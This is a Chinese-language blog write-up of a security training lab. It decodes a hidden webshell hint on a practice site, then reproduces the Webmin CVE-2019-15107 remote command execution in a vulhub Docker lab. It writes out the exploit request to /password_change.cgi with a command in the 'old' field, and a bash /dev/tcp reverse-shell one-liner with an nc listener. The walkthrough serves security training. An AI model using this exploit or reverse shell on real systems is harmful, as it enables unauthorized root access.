网络安全实训四(代码分析溯源、远程命令执行漏洞)

已于 2024-08-27 08:59:47 修改
阅读量481 收藏 7
点赞数 13
分类专栏: 网络安全实训 文章标签: web安全 安全
于 2024-08-17 23:44:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44512510/article/details/141288856
版权

1.代码分析溯源

  • 打开在线靶场网站,登陆后启动靶场环境
    在这里插入图片描述

  • 打开网站后查看到提示

在这里插入图片描述


  • 编写python脚本,对括号内的内容进行解码和解压缩的操作

在这里插入图片描述


  • 最终获取到echo $_REQUEST[a];

在这里插入图片描述

  • 对靶场网站的网址进行编辑,将命令赋值给a从而控制网站
    命令:ls

在这里插入图片描述


  • 使用tac查看key_160272192316483.php中的内容
    命令:tac key_160272192316483.php

在这里插入图片描述


  • 获取Key值后进行提交
    在这里插入图片描述

2.远程命令执行漏洞

2.1 环境搭建

  • 在kali机或者其他linux中获取docker
    命令:
sudo curl -fsSL https://get.docker.com | bash -s docker --mirror Aliyun

在这里插入图片描述


  • 更新apt
    命令:sudo apt-get update

在这里插入图片描述


  • 安装docker-compose
    命令:sudo apt-get install docker-compose
    在这里插入图片描述

  • 从github上获取vulhub
    命令:
sudo git clone https://github.com/vulhub/vulhub.git

在这里插入图片描述


  • 启动docker服务
    命令:sudo systemctl start docker

在这里插入图片描述


  • 查看docker运行状态
    命令:sudo systemctl status docker

在这里插入图片描述


  • 进入到之前安装的vulhub中webmin的CVE-2019-15107文件夹中
    在这里插入图片描述

  • 启动靶场环境
    命令:sudo docker-compose up -d

在这里插入图片描述


  • 查看docker启动的ID号
    命令:sudo docker ps
    在这里插入图片描述

  • 根据获取到的ID号进入网站的容器中
    命令:sudo docker exec -it ID /bin/bash

在这里插入图片描述


  • 进入Webmin,端口为10000,注意要使用HTTPS,否则会报错

在这里插入图片描述

2.2 漏洞复现

  • 回到容器界面,使用cat查看miniserv.conf,若passwd_mode=2则表示密码修改功能开启
    命令:cat /etc/webmin/miniserv.conf

在这里插入图片描述


  • 返回到网站界面,使用BP拦截登录请求,并将请求发送到Repeat

在这里插入图片描述


  • 将第一行的功能修改为 /password_change.cgi
    将最后一行的内容修改为:user=admin&old=ls&new1=test2&new2=test2
    其中old表示执行的命令

在这里插入图片描述


  • 执行whoami,在回复中看到已经是root权限

在这里插入图片描述


  • 查看IP地址

在这里插入图片描述


  • 将远程执行命令进行URL编码
    命令:bash -c “bash -i >& /dev/tcp/IP/1234 0>&1”

在这里插入图片描述


  • 对1234端口进行监听
    命令:nc -lnvp 1234

在这里插入图片描述


  • 重新修改请求并且发送

在这里插入图片描述


  • 远程连接成功

在这里插入图片描述

Wrop
关注
专栏目录
网络安全事件应急响应实战二
悦分享
09-14 1万+
当企业发生黑客入侵、系统崩溃或其它影响业务正常运行的安全事件时,急需第一时间进行处理,使企业的网络信息系统在最短时间内恢复正常工作,进一步查找入侵来源,还原入侵事故过程,同时给出解决方案与防范措施,为企业。新闻源网站一般权重较高,收录快,能够被搜索引擎优先收录,是黑灰产推广引流的必争之地,很容易成为被攻击的对象。短连接(short connnection)是相对于长连接而言的概念,指的是在数据传送过程中,只在需要发送数据时,才去建立一个连接,数据发送完成后,则断开此连接,即每次连接只完成一项业务的发送。
[系统安全] 一.什么是逆向分析、逆向分析基础及经典扫雷游戏逆向
杨秀璋的专栏
12-10 1万+
娜璋AI安全之家于2020年8月18日开通,将专注于Python和安全技术,主要分享Web渗透、系统安全、CVE复现、威胁情报分析、人工智能、大数据分析、恶意代码检测等文章。真心想把自己近十年的所学所做所感分享出来,与大家一起进步。 系统安全系列作者将深入研究恶意样本分析、逆向分析、攻防实战等,通过在线笔记和实践操作的形式分享与博友们学习,希望能与您一起进步。第一篇文章先带领大家学习什么是逆向分析,然后详细讲解逆向分析的典型应用,接着通过OllyDbg工具逆向分析经典的游戏扫雷,再通过Cheat Engin
[网络安全自学篇] 三十五.恶意代码攻击溯源及恶意样本分析
bylfsj的博客
02-05 9569
本文主要结合作者的《系统安全前沿》作业,师姐的论文及绿盟李东宏老师的博客,从产业界和学术界分别详细讲解恶意代码攻击溯源的相关知识。在学...
实习实训day11
ZXY10298的博客
09-11 611
Windows和Linux系统的应急响应流程在预案、研判、遏止、取证、溯源和恢复等关键环节上具有共性,但在具体操作细节上存在差异。例如,Windows系统可能需要通过任务管理器、事件查看器等工具进行排查和取证,而Linux系统则更多地依赖于命令行工具和日志文件。此外,不同操作系统在加固措施上也存在差异,需要根据具体情况制定相应的加固方案。1.总结应急响应流程(预案,研判,遏止,取证,溯源,恢复——无先后顺序,根据实际情况进行处理)2.总结应急响应措施及相关操作。
[安全攻防进阶篇] 一.什么是逆向分析、逆向分析应用及经典扫雷游戏逆向
热门推荐
杨秀璋的专栏
07-28 3万+
安全攻防进阶篇将更加深入的去研究恶意样本分析、逆向分析、内网渗透、网络攻防实战等。第一篇文章先带领大家学习什么是逆向分析,然后详细讲解逆向分析的典型应用,接着通过OllyDbg工具逆向分析经典的游戏扫雷,再通过Cheat Engine工具复制内存地址获取,实现一个自动扫雷程序。基础性文章,西电UI您有所帮助~
网络安全应急响应----2、Windows入侵排查
七天
03-17 6153
文章目录一、系统排查1、系统信息2、​​用户信息3、启动项4、计划任务5、服务自启动二、进程、端口排查1、进程排查2、端口排查三、文件痕迹排查1、敏感目录文件2、基于时间点查找、日志分析1、系统日志2、安全性日志3、应用程序日志五、内存分析六、流量分析 一、系统排查 1、系统信息 //可以显示本地计算机的硬件资源、组件、软件环境、正在运行的任务、服务、系统驱动程序、加载模块、启动程序等。 C:\Users\test>msinfo32 //Microsoft系统信息工具:Msinfo32.
网络安全工程师毕业答辩杂记
Gjqhs的博客
04-17 6717
目录 01 数通技术知识要点... 1 02 渗透测试基础... 1 03 渗透测试环境搭建与工具使用... 1 04 信息收集... 1 05 web安全... 2 06 不定性拓展内容... 2 07 应急响应... 2 08 安全基线... 3 09 操作系统要点... 3 01 数通技术知识要点 TCP/IP模型及OSI七层模型结构、名字、对应关系 TCP/IP网络层、传输层、数据链路层头部(尾部)结构(哪些主要字段,每个字段的用途)及长度。 IP子网划分与聚合
Graph Mining for Cybersecurity: A Survey——网络安全图挖掘:一项调查——全文翻译
qq_46063079的博客
06-03 1072
Graph Mining for Cybersecurity: A Survey网络安全图形挖掘:一项调查
基于审计日志和图神经网络的入侵检测及溯源Threatrace: Detecting and tracing host-based threats in node level through prove
宝藏女孩的成长日记
03-13 2331
像程序攻击、恶意软件植入和高级持续性威胁(APT)这样的基于主机的威胁在现代攻击者中很常见。最近的研究提出利用数据溯源中丰富的上下文信息来检测主机中的威胁。数据溯源是从系统审计数据构建的有向无环图。在溯源图中,节点代表系统实体(例如进程和文件),边代表信息流的方向中的系统调用。然而,以往的研究提取整个溯源图的特征,对与威胁相关的实体数量较少的情况不敏感,因此在搜寻隐匿威胁时性能较低。 作者提出了THREATRACE,这是一个基于异常的检测器,可以在没有先验攻击模式知识的情况下,在系统实体级别检测主机威胁。
为什么我们的网络攻击行为很难被检测?
程序员光剑
08-04 1297
在日益复杂的网络环境中,安全防护是一个综合性、多方面的过程。其中,对网络攻击行为的检测及响应也是非常重要的一环。检测网络攻击的手段很多,包括流量分析、入侵检测系统、日志分析、设备检测、身份验证等等,但网络攻击检测与防御存在着严重的矛盾。网络攻击行为很难被检测到,主要有以下原因:1.缺乏统一标准不管是流量分析还是设备检测,大都采用了不同协议、不同的报文特征作为检测依据。这导致攻击行为在检测过程中,会产生各种误判,无法准确地发现真正的攻击。2.流量指纹不足。
信息安全工程师第二版考试总结+笔记
IT技术
11-29 2万+
信息安全工程师第二版考试总结+笔记
CTF/AWD实战速胜指南,《AWD特训营》
等风来
10-13 4786
【文末送书】今天推荐一本网安领域优质书籍《AWD特训营》,本文将从其内容与优势出发,详细阐发其对于网安从业人员的重要性与益处。随着网络安全问题日益凸显,国家对网络安全人才的需求持续增长,随着知识的指数式增长及政策扶持,安全行业也迎来了春天。为了帮助读者了解AWD竞赛的各项内容以及攻防技术与工具的实际应用,《AWD特训营》应运而生在本书中,作者通过其丰富的参赛经验、长期的攻防对抗技术积累,围绕常见工具、常见加固措施、常见攻击手法、常见漏洞分析等展开“手把手”教学。本书是包含技术解析和技巧的真正的“实战指南”。
计算机网络安全基础:常见的网络安全威胁与防范
网络安全的基础概念 ## A. 什么是网络安全 网络安全指的是一系列技术、措施和实践,用于保护计算机网络和网络中的数据、通信和系统免受未经授权访问、攻击、损坏或泄露的威胁。它涵盖了网络硬件、软件、数据以及...
CVE-2024-1112 Resource Hacker 缓冲区溢出分析
信息安全
09-23 925
CVE-2024-1112 是 Resource Hacker 软件的一个缓冲区溢出漏洞。该漏洞存在于版本 3.6.0.92 中。由于软件在处理命令行中的文件路径时未对文件字符串长度进行限制,过长的字符串参数导致内存被过度写入,从而引发缓冲区溢出。
网络安全证书考取相关知识
aa98865646的博客
09-21 707
作者是个想进入网络安全行业发展的小白,目前没啥钱,是想自学以后挖漏洞赚钱的,看了这两个算是比较常见的证书看起来都要花不少钱的话,我感觉自己还是先自学一段时间再说吧,实战更重要,这些证书等以后有机会慢慢考吧,如果需要的话。欢迎大佬补充其他适合小白考取的证书,目前感觉4800+480的NISP一级证书比较适合在学校的小白,CISP的话再NISP考到二级以后再加钱4000就可以换成CISP了,NISP适合学生,CISP适合职场啊,不过都是要钱啊。
网络安全详解
weidl001的博客
09-21 1456
网络安全(Cybersecurity)是指保护网络系统、设备、程序及数据免受攻击、损坏或未授权访问的实践。其核心目标是确保信息的机密性、完整性和可用性。机密性(Confidentiality):确保信息仅被授权的人员访问。完整性(Integrity):保护信息不被未授权的修改或破坏。可用性(Availability):确保信息和资源在需要时可被访问和使用。
数据包签名校验的Web安全测试实践
INSBUG的博客
09-23 971
客户端和服务端使用相同的算法生成sign,服务端接收到请求后,先计算一次sign,如果业务参数、时间戳、其他参数中有一个被修改过,得到的sign与客户端发送的sign就会不一致,签名校验就会失败,服务端便不再处理请求。在金融类的Web安全测试中,经常可以见到Web请求和响应数据包加密和签名保护,由于参数不可见,不能重放请求包,这类应用通常不能直接进行有效的安全测试,爬虫也爬不到数据。点击“参数明文”控件,获取到了解密后的完整请求包,对明文参数进行安全测试,重放后插件会自动完成密文构造。
国产操作系统(统信UOS)网络安全等级保护基础安全加固
最新发布
2401_84434570的博客
09-26 590
统一操作系统UOS是由多家企业共同打造的中文国产操作系统。一、设置口令复杂度策略和有效期首先安装libpam-pwquality依赖包口令复杂度策略通过libpam-pwquality依赖包进行设置依赖包的安装命令:sudo apt-get install libpam-pwquality。依赖包的查看方式执行命令:dpkg -l libpam-pwquality。执行命令:vim etc/pam.d/common-passwd。
恶意代码攻击溯源与样本分析详解
本文主要探讨了恶意代码攻击的溯源及恶意样本分析,涵盖了学术界和产业界的视角,涉及特征提取、预处理、相似性计算、同源判定等多个方面,并介绍了产业界的恶意攻击流程及溯源方法。 一. 前言 网络安全事件与恶意...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值